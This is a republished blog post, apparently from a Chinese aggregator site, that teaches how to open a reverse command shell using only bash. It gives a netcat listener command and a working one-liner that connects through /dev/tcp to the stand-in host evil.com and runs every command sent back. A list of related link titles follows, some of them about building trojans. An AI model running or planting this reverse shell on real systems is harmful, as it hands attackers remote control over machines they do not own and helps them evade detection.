Reverse Shell with Bash
来源:互联网 发布:为什么男女有别 知乎 编辑:程序博客网 时间:2024/06/15 22:23
http://www.google.cn/search?hl=zh-CN&source=hp&q=http%3A%2F%2Flabs.neohapsis.com%2F2008%2F04%2F17%2Fconnect-back-shell-literally%2F&btnG=Google+%E6%90%9C%E7%B4%A2&aq=f&oq=
I am stuck at the Dubai International Airport and I have nothing else interesting to do. So, I though I might share a simple technique which will go into the Agile Hacking project. Here I will show you how to create a reverse command shell without using 3rd-party tools such as the all mighty netcat. Please read on!
When the pentester compromises a machine they often need to provide themselves with a user friendly access to the system. This is where command shells come into place. It is worth noting that there are a couple of variants of command shells. The typical shell consists of a generic network client, typically netcat, listening on a remote port which pipes output into something like bash. Another type of shell, which is known to be suitable when the pentester is restricted in terms of network service connectivity/availability, is the reverse shell which consists of a generic network client, again something like netcat, connecting to the attacker’s machine and piping input to bash. Most of the time, the attacker will use netcat, because this is the tool that is suggested in most security references and books.
Although netcat is quite useful, and you may have to use it in most cases, here is a simple technique which emulates what exactly netcat does but it relies on bash only. Let’s see how.
- In step one we start a listening service on our box. We can use netcat, or whatever you might have in hand.
$ nc -l -p 8080 -vvv
- On the target we have to perform some bash-fu. We will create a new descriptor which is assigned to a network node. Then we will read and write to that descriptor.
$ exec 5<>/dev/tcp/evil.com/8080$ cat <&5 | while read line; do $line 2>&5 >&5; done
There you go. Now everything we type in our local listening server will get executed on the target and the output of the commands will be piped back. Keep in mind that we don’t use any 3rd-party tools on the target but its default shell. This technique comes extremely handy in many situations and it leaves very small footprint on the targeted system.
- Reverse Shell with Bash
- Php reverse shell with netcat
- get bash shell with python fabric
- How to: Shellcode to reverse bind a shell with netcat
- Bash Special Parameters Explained with 4 Example Shell Scripts
- read line from file with bash shell script
- bash shell(bash) 快捷键
- bash shell(bash) 快捷键
- bash shell
- bash shell
- Shell(Bash)
- bash shell
- BASH SHELL
- shell bash
- bash shell
- bash shell
- Bash Shell
- Bash Shell
- D3DX Utility library概述
- Tomcat 5.5.26的网络构建指南
- 任正非:不要试图做完人(转)
- MySQL多表同时插入
- 因为不够专注
- Reverse Shell with Bash
- java去除字符串中的空格、回车、换行符、制表符
- 寒假学习总结 + 开会的总结 (by pingzi)
- Input Validation Cheat Sheet
- 轻松突破windows文件保护功能
- UVa 299 Train Swapping
- G o o g l e 重視言論自由權,那個人隱私權呢?
- 打造自己的木马分析实验室
- 打造简单手机通话记录获取木马